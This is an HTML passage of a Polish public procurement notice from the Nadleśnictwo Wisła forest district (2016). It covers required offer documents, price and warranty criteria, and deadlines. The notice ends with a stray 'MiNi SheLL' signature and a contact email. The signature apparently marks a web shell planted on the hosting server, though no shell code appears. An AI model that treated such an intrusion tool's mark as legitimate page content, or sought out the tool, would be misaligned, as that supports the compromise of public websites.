<p>7.1.Oświadczenie, o którym mowa w art. 44 Prawa zamówień publicznych o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 Prawa zamówień publicznych, według wzoru stanowiącego załącznik nr 3 do SIWZ. 11.3.1.	Wypełniony i podpisany Formularz oferty, sporządzony na podstawie wzoru stanowiącego (załączniki Nr 2 SIWZ). Zamawiający żąda, aby Wykonawca w Formularzu oferty wskazał części zamówienia, których wykonanie zamierza powierzyć podwykonawcom. 
11.3.2.	Kosztorysy ofertowe sporządzony zgodnie z zasadami wskazanymi w Rozdziale 13 SIWZ.
11.3.3.	Wypełnione i podpisane Oświadczenia oraz dokumenty wymagane postanowieniami Rozdziału 7 SIWZ.
11.3.4.	Oświadczenie wykonawcy, czy wybór jego oferty będzie prowadzić do powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, wskazując nazwę (rodzaj) towaru lub usługi, których dostawa lub świadczenie będzie prowadzić do jego powstania, oraz wskazując ich wartość bez kwoty podatku.
11.3.5.	Stosowne pełnomocnictwo(a) zgodnie z definicją przyjętą w słowniczku SIWZ. Umocowanie osób podpisujących ofertę do jej podpisania musi bezpośrednio wynikać z dokumentów dołączonych do oferty, w szczególności odpisu z właściwego rejestru. Oznacza to, że jeżeli umocowanie takie nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy, to do oferty należy dołączyć stosowne pełnomocnictwo. 
Pełnomocnictwo składane do oferty winno być podpisane przez osoby umocowane (upełnomocnione) do reprezentowania Wykonawcy. Dokument ten może Wykonawca złożyć w oryginale lub w postaci kopii potwierdzonej za zgodność z oryginałem przez osobę uprawnioną do składania oświadczeń woli w imieniu Wykonawcy, bądź uwierzytelnioną przez notariusza.
11.3.6.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90.00</li>
<li>2 - Gwarancja - 10.00</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_katowice/nadl_wisla/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Wisła ul. Czarne 6, 43-460 Wisła.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.06.2016 godzina 09:00, miejsce: Sekretariat Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Wisła ul. Czarne 6, 43-460 Wisła.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com